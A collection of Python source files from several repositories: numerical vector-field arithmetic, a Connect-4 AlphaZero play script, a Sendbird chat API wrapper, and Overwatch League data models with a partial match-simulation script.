res_target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
return vector_field(res_domain,target=res_target,domain_explicit=True,val=res_val)
else:
res_val = self.val/x.val.astype(self.domain.datatype)
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
else:
raise ValueError(about._errors.cstring("ERROR: incompatible domains."))
else:
res_val = self.domain.enforce_values(x,extend=False)
res_val = self.val/res_val
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
__truediv__ = __div__
def __rdiv__(self,x):
if(isinstance(x,field)):
if(self.domain==x.domain):
res = super(vector_field,self).__rdiv__(x)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
else:
if(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
res_val = x.val/self.val.astype(x.domain.datatype)
res_domain = nested_space([self.domain.nest[0],x.domain])
res_target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
return vector_field(res_domain,target=res_target,domain_explicit=True,val=res_val)
else:
res_val = x.val.astype(self.domain.datatype)/self.val
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
else:
raise ValueError(about._errors.cstring("ERROR: incompatible domains."))
else:
res_val = self.domain.enforce_values(x,extend=False)
res_val = res_val/self.val
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
__rtruediv__ = __rdiv__
def __idiv__(self,x): ## __idiv__ : self /= x
if(isinstance(x,field)):
if(self.domain==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = x.domain
self.val /= x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = x.domain.get_codomain()
else:
self.val /= x.val.astype(self.domain.datatype)
elif(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = nested_space([self.domain.nest[0],x.domain])
self.val /= x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
else:
self.val /= x.val.astype(self.domain.datatype)
else:
raise ValueError(about._errors.cstring("ERROR: inequal domains."))
else:
x = self.domain.enforce_values(x,extend=False)
self.val /= x
return self
def __add__(self,x):
if(isinstance(x,field)):
if(self.domain==x.domain):
res = super(vector_field,self).__add__(x)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
else:
if(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
res_val = self.val.astype(x.domain.datatype)+x.val
res_domain = nested_space([self.domain.nest[0],x.domain])
res_target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
return vector_field(res_domain,target=res_target,domain_explicit=True,val=res_val)
else:
res_val = self.val+x.val.astype(self.domain.datatype)
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
else:
raise ValueError(about._errors.cstring("ERROR: incompatible domains."))
else:
res_val = self.domain.enforce_values(x,extend=False)
res_val = self.val+res_val
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
__radd__ = __add__
def __iadd__(self,x): ## __iadd__ : self += x
if(isinstance(x,field)):
if(self.domain==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = x.domain
self.val += x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = x.domain.get_codomain()
else:
self.val += x.val.astype(self.domain.datatype)
elif(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = nested_space([self.domain.nest[0],x.domain])
self.val += x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
else:
self.val += x.val.astype(self.domain.datatype)
else:
raise ValueError(about._errors.cstring("ERROR: inequal domains."))
else:
x = self.domain.enforce_values(x,extend=False)
self.val += x
return self
def __sub__(self,x):
if(isinstance(x,field)):
if(self.domain==x.domain):
res = super(vector_field,self).__sub__(x)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
else:
if(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
res_val = self.val.astype(x.domain.datatype)-x.val
res_domain = nested_space([self.domain.nest[0],x.domain])
res_target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
return vector_field(res_domain,target=res_target,domain_explicit=True,val=res_val)
else:
res_val = self.val-x.val.astype(self.domain.datatype)
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
else:
raise ValueError(about._errors.cstring("ERROR: incompatible domains."))
else:
res_val = self.domain.enforce_values(x,extend=False)
res_val = self.val-res_val
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
def __rsub__(self,x):
return(-(self.__sub__(x)))
def __isub__(self,x): ## __isub__ : self -= x
if(isinstance(x,field)):
if(self.domain==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = x.domain
self.val -= x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = x.domain.get_codomain()
else:
self.val -= x.val.astype(self.domain.datatype)
elif(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = nested_space([self.domain.nest[0],x.domain])
self.val -= x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
else:
self.val -= x.val.astype(self.domain.datatype)
else:
raise ValueError(about._errors.cstring("ERROR: inequal domains."))
else:
x = self.domain.enforce_values(x,extend=False)
self.val -= x
return self
def __pow__(self,x):
res = super(vector_field,self).__pow__(x)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
def __rpow__(self,x):
res = super(vector_field,self).__rpow__(x)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
def plot(self,**kwargs):
if("title" in kwargs):
title = kwargs.__getitem__("title") + " -- "
kwargs.__delitem__("title")
else:
title = ""
for ii in range(self.Ndim()):
field(self.domain.nest[1],target=self.target.nest[1],val=self.val[ii]).plot(title=title+"component {}".format(ii),**kwargs)
def Ndim(self):
return self.domain.nest[0].para[0]
def component(self,jjj):
try:
jj = int(jjj)
except:
raise TypeError("ERROR: invalid input.")
if((jj<0) or (jj>(self.Ndim()-1))):
raise ValueError("ERROR: index needs to be between 0 and {}".format(self.Ndim()-1))
return field(self.domain.nest[1],target=self.target.nest[1],val=self.val[jj])
class position_field(vector_field):
def __init__(self,domain,target=None,**kwargs):
## check domain
if(not isinstance(domain,space)):
raise TypeError(about._errors.cstring("ERROR: invalid input."))
self.domain = nested_space([point_space(domain.naxes()),domain])
## check codomain
if(target is None):
target = domain.get_codomain()
else:
domain.check_codomain(target)
self.target = nested_space([self.domain.nest[0],target])
ndim = domain.para[:domain.naxes()]
temp_vecs = np.array(np.where(np.ones(ndim))).reshape(np.append(domain.naxes(),ndim))
corr_vecs = domain.zerocenter()*ndim/2
self.val = np.array([domain.vol[ii]*(temp_vecs[ii]-corr_vecs[ii]) for ii in range(len(domain.vol))])
        self.val = self.val[::-1]
``` |
{
"source": "jpbruneton/Alpha-Zero-algorithm-for-Connect-4-game",
"score": 2
} |
#### File: jpbruneton/Alpha-Zero-algorithm-for-Connect-4-game/play_against_human.py
```python
from MCTS_NN import Node, MCTS_NN
from Game_bitboard import Game
import numpy as np
from ResNet import ResNet
import ResNet
import time
import torch.utils
def onevsonehuman(budget, whostarts):
if whostarts == 'computer':
modulo = 1
else:
modulo = 0
file_path_resnet = './best_model_resnet.pth'
best_player_so_far = ResNet.resnet18()
best_player_so_far.load_state_dict(torch.load(file_path_resnet))
game = Game()
tree = MCTS_NN(best_player_so_far, use_dirichlet=False)
rootnode = tree.createNode(game.state)
currentnode = rootnode
turn = 0
isterminal = 0
while isterminal == 0:
turn = turn + 1
if turn % 2 == modulo:
player = 'computer'
sim_number = budget
else:
player = 'human'
if player=='computer':
            print('===============AI playing================')
for sims in range(0, sim_number):
tree.simulate(currentnode, cpuct=1)
treefordisplay = MCTS_NN(best_player_so_far, False)
rootnodedisplay = treefordisplay.createNode(game.state)
treefordisplay.expand_all(rootnodedisplay)
tree.eval_leaf(rootnodedisplay)
pchild = rootnodedisplay.proba_children
pchild = [int(1000 * x) / 10 for x in pchild]
for child in rootnodedisplay.children:
treefordisplay.eval_leaf(child)
Qs = [int(100 * child.Q) / 100 for child in rootnodedisplay.children]
print('NN thoughts', pchild, Qs)
visits_after_all_simulations = []
for child in currentnode.children:
visits_after_all_simulations.append(child.N)
print('result visits', visits_after_all_simulations)
time.sleep(0.5)
values = np.asarray(visits_after_all_simulations)
imax = np.random.choice(np.where(values == np.max(values))[0])
print('choice made', imax)
currentnode = currentnode.children[imax]
else: #human player
print('=============== your turn =====================')
game=Game(currentnode.state)
game.display_it()
moves=game.allowed_moves()
            print('choose a move from 0 to 6 -- beware of full columns! (they are not taken into account: e.g. if column three is full, enter 5 instead of 6 to play in the last column)')
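            # The index entered is a position in the allowed_moves list, not a raw column
            # number, as the prompt above notes: with column 3 full, moves == [0, 1, 2, 4, 5, 6]
            # (assumed shape of allowed_moves), so entering 5 plays the rightmost column.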
human_choice=int(input())
game.takestep(moves[human_choice])
currentnode=Node(game.state, moves[human_choice])
# reinit tree
game = Game(currentnode.state)
tree = MCTS_NN(best_player_so_far, use_dirichlet=False)
rootnode = tree.createNode(game.state)
currentnode = rootnode
isterminal = currentnode.isterminal()
game = Game(currentnode.state)
gameover, winner = game.gameover()
#print('end of game')
if winner == 0:
toreturn = 'draw'
print('draw')
elif winner == 1:
if whostarts == 'computer':
print('computer wins')
toreturn = 'budget1'
else:
print('you win')
toreturn = 'budget2'
elif winner == -1:
if whostarts == 'computer':
            print('you win')
toreturn = 'budget2'
else:
print('computer wins')
toreturn = 'budget1'
return toreturn
#set the number of sims the NN player gets:
sim_number = 200
# set who starts, 'human' or 'computer'
onevsonehuman(200, 'human')
``` |
{
"source": "jpbullalayao/sendbird-python",
"score": 3
} |
#### File: api_resources/abstract/api_resource.py
```python
import abc
import sendbird
from sendbird import http_methods
from sendbird.api_requestor import APIRequestor
from sendbird.sendbird_object import SendbirdObject
from sendbird.util import convert_to_sendbird_object
class APIResource(SendbirdObject):
@classmethod
def retrieve(cls, pk, api_token=None, **params):
requestor = APIRequestor(
api_token
)
instance = cls(pk, api_token, **params)
instance.refresh(requestor)
return instance
def refresh(self, requestor):
response = requestor.request(http_methods.HTTP_METHOD_GET, self.instance_url())
sendbird_object = convert_to_sendbird_object(response, self.__class__)
self.refresh_from(sendbird_object)
return self
@classmethod
def class_url(cls):
if cls == APIResource:
raise NotImplementedError(
"APIResource is an abstract class. You should perform "
"actions on its subclasses (e.g. Message)"
)
return "{resource_name}s".format(
resource_name=cls.RESOURCE_NAME
)
@abc.abstractmethod
def instance_url(self):
raise NotImplementedError
@classmethod
def static_request(cls, method, url, api_token=None, params=None, headers=None):
requestor = APIRequestor(
api_token or sendbird.api_token
)
response = requestor.request(method, url, params)
sendbird_object = convert_to_sendbird_object(response, cls)
return sendbird_object
def request(self, method, url, params=None, headers=None):
requestor = APIRequestor(
self.api_token,
)
response = requestor.request(method, url, params)
sendbird_object = convert_to_sendbird_object(response, self.__class__)
return sendbird_object
```
#### File: sendbird/api_resources/group_channel.py
```python
from sendbird import api_endpoints
from sendbird import http_methods
from sendbird.api_resources.channel import Channel
class GroupChannel(Channel):
RESOURCE_NAME = "group_channel"
def list_members(self):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_LIST_MEMBERS
return self.request(http_methods.HTTP_METHOD_GET, url)
def check_if_member(self, **params):
user_id = params.get("user_id")
formatted_endpoint = api_endpoints.GROUP_CHANNEL_CHECK_IF_MEMBER.format(
user_id=user_id
)
url = self.instance_url() + formatted_endpoint
return self.request(http_methods.HTTP_METHOD_GET, url, params=params).is_member
def accept_invitation(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_ACCEPT_INVITATION
return self.request(http_methods.HTTP_METHOD_PUT, url, params=params)
def reject_invitation(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_REJECT_INVITATION
return self.request(http_methods.HTTP_METHOD_PUT, url, params=params)
def join(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_JOIN
return self.request(http_methods.HTTP_METHOD_PUT, url, params=params)
def leave(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_LEAVE
return self.request(http_methods.HTTP_METHOD_PUT, url, params=params)
def hide(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_HIDE
return self.request(http_methods.HTTP_METHOD_PUT, url, params=params)
def unhide(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_UNHIDE
return self.request(http_methods.HTTP_METHOD_DELETE, url, params=params)
def reset_chat_history(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_RESET_CHAT_HISTORY
return self.request(http_methods.HTTP_METHOD_PUT, url, params=params)
def invite_users(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_INVITE_USERS
return self.request(http_methods.HTTP_METHOD_POST, url, params=params)
``` |
{
"source": "jpburnett/overwatch-league-skill",
"score": 3
} |
#### File: py/owl_model/easteregg.py
```python
from owl_model.modelobject import ModelObject
class EasterEgg(ModelObject):
"""
The Easter Egg in the API
"""
cls_attr_types = {
'theWorld': 'str'
}
cls_attr_map = {
'theWorld': 'the world'
}
def __init__ (self, theWorld=None):
"""
API request at the default endpoint
"""
self.theWorld = theWorld
```
#### File: py/owl_model/game.py
```python
from owl_model.modelobject import ModelObject
class Game(ModelObject):
"""
An OWL game
A match in OWL is a best-of-X competition where two teams play X games and
the winner of the match is considered to be the team winning the majority of
the games.
"""
cls_attr_types = {
'id': 'str',
'map': 'owl_model.map.Map',
'vod': 'owl_model.url.Vod',
'players': 'list[owl_model.player.Player]',
'state': 'str',
'status': 'str',
#stats : TODO: watch this field closely, this seems new.
'matchid': 'dict(str, str)'
}
cls_attr_map = {
'id': 'id',
'map': 'attributes',
'vod': 'vodLink',
'players': 'players',
'state': 'state',
'status': 'status',
#'stats': 'stats',
'matchid': 'match'
}
def __init__ (self, id=None, map=None, vod=None, players=None,
state=None, status=None, matchid=None):
"""
"""
self.id = id
self.map = map
self.vod = vod
self.players = players
self.state = state
self.status = status
self.matchid = matchid
def finalize_init (self):
"""
"""
self.matchid = self.matchid['id']
```
#### File: py/owl_model/league.py
```python
from owl_model.modelobject import ModelObject
# TODO: Noted previously, the League class was made after a decision to separate the
# TeamsRequest (APIRequest) class from the model objects holding the information. The
# problem was that the APIRequest was returning a TeamsRequest object which
# would have all the APIRequest/URL methods, which overwhelms the class and is
# really not necessary. This is one approach.
# However, another approach would be to rewrite the TeamsRequest (and the other
# inherited APIRequest classes) so that they return objects in the model. For example,
# the TeamsRequest would instead parse the data and return a list of teams (e.g.,
# list[owl_model.team.Team]) and other model objects; a rough commented sketch of
# that alternative follows below.
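# Illustrative sketch only (not how the model is written today): the alternative
# described above would have the request layer return plain model objects, e.g.
#
#     class TeamsRequest(APIRequest):
#         def parse(self, data):
#             return [Team.deserialize(d['competitor']) for d in data['competitors']]
#
# APIRequest, TeamsRequest.parse and Team.deserialize are hypothetical names here,
# standing in for whatever the real request layer exposes.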
class League(ModelObject):
"""
Collection of all OWL Teams
"""
# TODO: build a way to alias team names. Currently the team model has a
# shortname attribute that is a 3 letter initial but sometimes we may like
# to refer to the teams by spoken shorthand name e.g., Fuel, Fusion,
    # Uprising, etc. (or at least we did beforehand).
teams_id_map = {
        '4523': 'Dallas Fuel',
'4524': 'Philadelphia Fusion',
'4525': 'Houston Outlaws',
'4402': 'Boston Uprising',
'4403': 'New York Excelsior',
'4404': 'San Francisco Shock',
'4405': 'Los Angeles Valiant',
'4406': 'Los Angeles Gladiators',
'4407': 'Florida Mayhem',
'4408': 'Shanghai Dragons',
'4409': 'Seoul Dynasty',
'4410': 'London Spitfire',
'7692': 'Chengdu Hunters',
'7693': 'Hangzhou Spark',
'7694': 'Paris Eternal',
'7695': 'Toronto Defiant',
'7696': 'Vancouver Titans',
'7697': 'Washington Justice',
'7698': 'Atlanta Reign',
'7699': 'Guangzhou Charge'
}
cls_attr_types = {
        # This was the implementation before adding the bootstrap_subclass
        # method; it was changed and is now commented out because it felt
        # awkward compared to the rest of the model interfaces.
        # For example, to access the teams it would be
# league = sd.deserialize(r.content, TeamRequest)
# ...
# league.leagueteams[0]['competitor'] -> this is a owl_model.team.Team
#'leagueteams': 'list[dict(str, owl_model.team.Team)]',
'teams': 'list[owl_model.team.Team]',
'divisions': 'list[owl_model.team.Division]',
'logo': 'owl_model.url.Logo'
}
cls_attr_map = {
'teams': 'competitors',
'divisions': 'owl_divisions',
'logo': 'logo'
}
@classmethod
def bootstrap_subclass(cls, data):
"""
        The /teams request endpoint has the usual 'competitors' key indicating
        participating teams. However, each entry in the list wraps the actual
        owl_model.team.Team structure inside another object with two extra
        keys. One is the 'division' key, which is the same for all teams in
        this call; it looks like this division identifies the team as
        belonging to the game Overwatch rather than a division within
        Overwatch. To make this 'competitors' list look like a list of teams
        we have to modify the list.
"""
teams = []
for team in data['competitors']:
teams.append(team['competitor'])
data['competitors'] = teams
return data
def __init__ (self, teams=None, divisions=None):
"""
"""
self.teams = teams
self.divisions = divisions
```
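A minimal standalone sketch of the reshaping `League.bootstrap_subclass` performs above; the miniature `/teams` payload here is assumed for illustration and only mirrors the `competitors`/`competitor` nesting described in the docstring:
```python
# Assumed miniature /teams payload: each list entry wraps the real team dict
# under a 'competitor' key, next to a game-level 'division' key.
raw = {
    "competitors": [
        {"competitor": {"id": "4402", "name": "Boston Uprising"}, "division": {"id": "1"}},
        {"competitor": {"id": "4403", "name": "New York Excelsior"}, "division": {"id": "1"}},
    ],
}

# Same flattening as bootstrap_subclass: keep only the inner 'competitor' dicts
# so the list matches what the team deserializer expects.
raw["competitors"] = [entry["competitor"] for entry in raw["competitors"]]

print(raw["competitors"])
# [{'id': '4402', 'name': 'Boston Uprising'}, {'id': '4403', 'name': 'New York Excelsior'}]
```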
#### File: py/owl_model/map.py
```python
from owl_model.modelobject import ModelObject
class Map(ModelObject):
"""
An OWL map
    A map in Overwatch is in many ways synonymous with the term "game" because
    playing a map comes with different objective goals. There are 4 different map
    types that determine the objective for victory.
"""
cls_attr_types = {
'name': 'str',
'id': 'str',
'type': 'str'
}
cls_attr_map = {
'name': 'map',
'id': 'mapGuid',
'type': 'type'
}
map_type_discriminator = {
'junkertown': 'escort',
'dorado': 'escort',
'route-66': 'escort',
'gibraltar': 'escort',
'rialto': 'escort',
'havana': 'escort',
'hanamura': 'assault',
'volskaya': 'assault',
'temple-of-anubis': 'assault',
'horizon-lunar-colony': 'assault',
'paris': 'assault',
'kings-row': 'hybrid',
'numbani': 'hybrid',
'hollywood': 'hybrid',
'eichenwalde': 'hybrid',
'blizzard-world': 'hybrid',
'nepal': 'control',
'ilios': 'control',
'lijiang-tower': 'control',
'oasis': 'control',
'busan': 'control',
}
def __init__ (self, id=None, name=None, type=None):
"""
"""
self.id = id
self.name = name
self.type = type
def finalize_init (self):
"""
"""
if self.name is not None:
self.type = self.map_type_discriminator[self.name]
```
#### File: py/owl_model/match.py
```python
from owl_model.modelobject import ModelObject
class Match(ModelObject):
"""
An OWL match
"""
cls_attr_types = {
'id': 'str',
'teams': 'list[owl_model.team.Team]',
'games': 'list[owl_model.game.Game]',
'startdate': 'datetime',
'enddate': 'datetime',
'startTS': 'datetime',
'endTS': 'datetime',
'timezone': 'str'
}
cls_attr_map = {
'id': 'id',
'teams': 'competitors',
'games': 'games',
'startdate': 'startDate',
'enddate': 'endDate',
'startTS': 'startDateTS',
'endTS': 'endDateTS',
'timezone': 'timeZone'
}
def __init__ (self, id=None, teams=None, games=None, startdate=None,
enddate=None, startTS=None, endTS=None, timezone=None):
"""
"""
self.id = id
self.teams = teams
self.games = games
self.startdate = startdate
self.enddate = enddate
self.startTS = startTS
self.endTS = endTS
self.timezone = timezone
```
#### File: py/owl_model/team.py
```python
from owl_model.modelobject import ModelObject
class Team(ModelObject):
"""
An OWL team
"""
    # TODO: This approach seems to be working, although sometimes unexpected
    # behavior happens when passing primitive types. For example, I think I
    # passed in 'string' instead of 'str' as a test and that wrong builtin type
    # did not faze anything. I got the right answer, but that was unexpected.
    # This makes me think the __deserialize method, while it does work, may be
    # more complicated than it needs to be. The todo here is to investigate this.
cls_attr_types = {
'id': 'str',
'name': 'str',
'players': 'list[owl_model.player.Player]',
'schedule': 'list[owl_model.match.Match]',
'ranking': 'dict(str, str)',
'division': 'str',
'hometown': 'str',
'country': 'str',
'shortname': 'str',
'logo': 'owl_model.url.Logo',
'logolrg': 'owl_model.url.Logo',
'icon': 'owl_model.url.Icon',
'colorA': 'str',
'colorB': 'str'
}
cls_attr_map = {
'id': 'id',
'name': 'name',
'players': 'players',
'schedule': 'schedule',
'ranking': 'ranking',
'division': 'owl_division',
'hometown': 'homeLocation',
'country': 'addressCountry',
'shortname': 'abbreviatedName',
'logo': 'logo',
'logolrg': 'secondaryPhoto',
'icon': 'icon',
'colorA': 'primaryColor',
'colorB': 'secondaryColor'
}
@classmethod
def bootstrap_subclass(cls, data):
"""
        As written now the owl_model expects a list[owl_model.player.Player]
        and each owl_model.player.Player has an owl_model.player.PlayerInfo
        attribute.
        Requests to the OWL API that include Team information are inconsistent
        in the way they return it, so the data does not always match this
        assumption (e.g., the /teams endpoint differs, and 'players' is not
        even present in the /match/id request).
        This bootstraps the team component to match the owl_model expectation.
"""
        # accommodate the v2 endpoint
if 'data' in data:
data = data['data']
# handle when no players are present in team info
if not 'players' in data:
return data
# require that players match owl_model.player.Player
players = []
for player in data['players']:
if 'team' in player.keys():
# already matches expected PlayerInfo structure
d = player
else:
# need to set up the structure
d = {
'team': {'id': data['id'], 'type':'TEAM'},
'player': player,
'flags':[]
}
players.append(d)
data['players'] = players
return data
def __init__ (self, id=None, name=None, players=None, division=None,
schedule=None, ranking=None, hometown=None, country=None,
shortname=None, logo=None, logolrg=None, icon=None,
colorA=None, colorB=None):
self.id = id
self.name = name
self.players = players
self.schedule = schedule
self.ranking = ranking
self.division = division
self.hometown = hometown
self.country = country
self.shortname = shortname
self.logo = logo
self.logolrg = logolrg
self.icon = icon
self.colorA = colorA
self.colorB = colorB
class Division(ModelObject):
"""
    A division is a logical group of teams that compete against each other in the
    standings for an opportunity at the playoffs.
Right now the league consists of two major divisions (Atlantic and Pacific)
and no subdivisions within these divisions.
"""
cls_attr_types = {
'id': 'str',
'name': 'str',
'shortname': 'str'
}
cls_attr_map = {
'id': 'id',
'name': 'name',
'shortname': 'abbrev'
}
def __init__ (self, id=None, name=None, shortname=None):
"""
"""
self.id = id
self.name = name
self.shortname = shortname
```
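A small standalone sketch of the player normalisation that `Team.bootstrap_subclass` describes; the bare-player payload below is assumed for illustration:
```python
# Assumed team payload in which 'players' mixes bare player dicts with entries
# that already follow the {'team': ..., 'player': ..., 'flags': []} structure.
data = {
    "id": "4410",
    "players": [
        {"id": "p1", "name": "PlayerOne"},  # bare player, needs wrapping
        {"team": {"id": "4410", "type": "TEAM"},
         "player": {"id": "p2", "name": "PlayerTwo"},
         "flags": []},                      # already in the expected shape
    ],
}

# Same normalisation as bootstrap_subclass: wrap bare players so every entry
# matches the PlayerInfo-style structure the player model expects.
players = []
for player in data["players"]:
    if "team" in player:
        players.append(player)
    else:
        players.append({"team": {"id": data["id"], "type": "TEAM"},
                        "player": player,
                        "flags": []})
data["players"] = players
```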
#### File: py/owl_skill/exception_handlers.py
```python
from ask_sdk_core.dispatch_components import AbstractExceptionHandler
from ask_sdk_core.handler_input import HandlerInput
# import resources for the audio lines
from utils import resources as resource
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class CatchAllExceptionHandler(AbstractExceptionHandler):
"""Catch all exception handler, log exception and
respond with custom message.
"""
def can_handle(self, handler_input, exception):
# type: (HandlerInput, Exception) -> bool
return True
def handle(self, handler_input, exception):
# type: (HandlerInput, Exception) -> Response
logger.error(exception, exc_info=True)
speech = "Sorry, there was some problem. Please try again!!"
ssmlSpeech = '<audio src=\"' + resource.AUDIO['errorSounds']['mei'] + '"\/> ' + speech
handler_input.response_builder.speak(ssmlSpeech).ask(ssmlSpeech)
return handler_input.response_builder.response
```
#### File: overwatch-league-skill/OWLMonteCarlo/owl_game_sim.py
```python
import os, sys, json, requests
import datetime as dt
import time
import numpy as np
from scipy.stats import poisson
import matplotlib.pyplot as plt
# NOTE: TEAM1 = AWAY TEAM (ATK FIRST)
# TEAM2 = HOME TEAM (DEF FIRST)
SOURCE = "NETWORK"
ESCORT = ['junkertown', 'dorado', 'route-66', 'gibraltar']
ASSAULT = ['hanamura', 'volskaya', 'temple-of-anubis', 'horizon-lunar-colony']
HYBRID = ['kings-row', 'numbani', 'hollywood', 'eichenwalde', 'blizzard-world']
CONTROL = ['nepal', 'ilios', 'lijiang', 'oasis']
TEAM_ID = {
'4523' : 'fuel',
'4524' : 'fusion',
'4525' : 'outlaws',
'4402' : 'uprising',
'4403' : 'excelsior',
'4404' : 'shock',
'4405' : 'valiant',
'4406' : 'gladiators',
'4407' : 'mayhem',
'4408' : 'dragons',
'4409' : 'dynasty',
'4410' : 'spitfire'
}
class dataManager:
def __init__(self, root=None, src=SOURCE, ext='.json'):
self.root = root
self.src = src
self.ext = ext
def fetchData(self, route):
url = os.path.join(self.root, route)
if self.src == "NETWORK":
# fetch from network url and json decode
r = requests.get(url).json()
else:
# open json file
fp = open(url+self.ext, 'r')
r = json.load(fp)
return r
class WL_hist:
def __init__(self, min, max):
self.homePts = simple_hist(min, max)
self.awayPts = simple_hist(min, max)
def binHomePts(self, val):
self.homePts.bin(val)
def binAwayPts(self, val):
self.awayPts.bin(val)
class simple_hist:
def __init__(self, min, max):
self.min = min
self.max = max
self.bins = np.zeros(int(max - min))
def bin(self, value):
self.bins[value] += 1
class league:
def __init__(self):
self.teams = []
def addTeam(self, team):
self.teams.append(team)
def getTeam(self, id):
if len(self.teams) == 0:
return None
for i in range(0, len(self.teams)):
t = self.teams[i]
if t.id == id:
return t
print "Team not found..."
return None
def printOverallStandings(self):
print '{:<6s}{:<24s} W-L MAP W-L-T'.format("ID", "Name")
print "--------------------------------------------------"
for t in self.teams:
print '{:<6d}{:<24s} {:2d}-{:<2d} {:2d}-{:2d}-{:<2d}'.format(t.id, t.name, t.W, t.L, t.wins, t.loss,
t.tie)
print "--------------------------------------------------"
print '{:<6s}{:<24s} MAP {:<3d}-{:<3d}-{:2d}'.format("####", "League Totals", totalPtsWin, totalPtsLoss,
totalPtsTie)
print ""
class team:
def __init__(self, obj):
self.name = obj['competitor']['name']
self.id = obj['competitor']['id']
self.place = obj['placement']
record = obj['records'][0]
self.wins = record['gameWin']
self.loss = record['gameLoss']
self.tie = record['gameTie']
self.W = record['matchWin']
self.L = record['matchLoss']
self.simResults = {
"wins" : 0,
"loss" : 0,
"tie" : 0,
"W" : 0,
"L" : 0
}
        self.matchesPlayed = 0
self.streak = 0
self.escortPts = 0
self.escortPtsLost = 0
self.escortPlayed = 0
self.hybridPts = 0
self.hybridPtsLost = 0
self.hybridPlayed = 0
self.controlPts = 0
self.controlPtsLost = 0
self.controlPlayed = 0
self.assaultPts = 0
self.assaultPtsLost = 0
self.assaultPlayed = 0
self.escortAtk = 0
self.escortDef = 0
self.hybridAtk = 0
self.hybridDef = 0
self.controlAtk = 0
self.controlDef = 0
self.assaultAtk = 0
self.assaultDef = 0
league = league()
totalPtsWin = 0
totalPtsLoss = 0
totalPtsTie = 0
totalHomePts = 0
totalAwayPts = 0
team1Matches = 0 # team1 matches == team2 matches == matches played (hopefully) maybe matches concluded?
team2Matches = 0
totalEscortPts = 0
totalEscortPlayed = 0
totalAssaultPts = 0
totalAssaultPlayed = 0
totalHybridPts = 0
totalHybridPlayed = 0
totalControlPts = 0
totalControlPlayed = 0
matchesConcluded = 0
matchesPlayed = 0 # there is a discrepancy between matches played and matches concluded because of season stage finals and preseason
escort_hist = WL_hist(0,10)
hybrid_hist = WL_hist(0,10)
control_hist = WL_hist(0,3)
assault_hist = WL_hist(0,10)
# escort_hist = simple_hist(0,10)
# hybrid_hist = simple_hist(0,10)
# control_hist = simple_hist(0,4)
# assault_hist = simple_hist(0,10)
# initialize the data source information
if SOURCE == "NETWORK":
rootURL = 'https://api.overwatchleague.com'
else:
rootURL = './data'
dm = dataManager(rootURL)
# Get team standings and initialize league
response = dm.fetchData('standings')
ranks = response['ranks']
for rank in ranks:
t = team(rank)
league.addTeam(t)
totalPtsWin += t.wins
totalPtsLoss += t.loss
totalPtsTie += t.tie
league.printOverallStandings()
# get the number of matches played... figured it was better to get it from the API
response = dm.fetchData('ranking')
matchesConcluded = response['matchesConcluded'] # matches concluded from the API is different from the count because it doesn't include playoff games
totalMatchCount = 0
# Now get all the matches played by the team and fill in their map type scores
now = int(time.time()*1000)
response = dm.fetchData('schedule')
stages = response['data']['stages']
startStgIdx = 1
stageEndIdx = 5 # preseason is id 0
for s in stages[startStgIdx:stageEndIdx]:
print 'Processing matches for stage {:d}...'.format(s['id'])
matches = s['matches']
matches = sorted(matches, key=lambda x: x['startDateTS'])
for m in matches:
if m['state'] == "CONCLUDED":
#if now > m['startDateTS']:
totalMatchCount += 1
totalAwayPts += m['scores'][0]['value']
totalHomePts += m['scores'][1]['value']
t1 = league.getTeam(m['competitors'][0]['id']) # away
t2 = league.getTeam(m['competitors'][1]['id']) # home
t1.matchesPlayed += 1
t2.matchesPlayed += 1
games = m['games']
for g in games:
if g['state'] == "CONCLUDED":
gAttrs = g['attributes']
mapType = gAttrs['map']
if mapType in ESCORT:
t1.escortPts += gAttrs['mapScore']['team1']
t1.escortPtsLost += gAttrs['mapScore']['team2']
t2.escortPtsLost += gAttrs['mapScore']['team1']
t2.escortPts += gAttrs['mapScore']['team2']
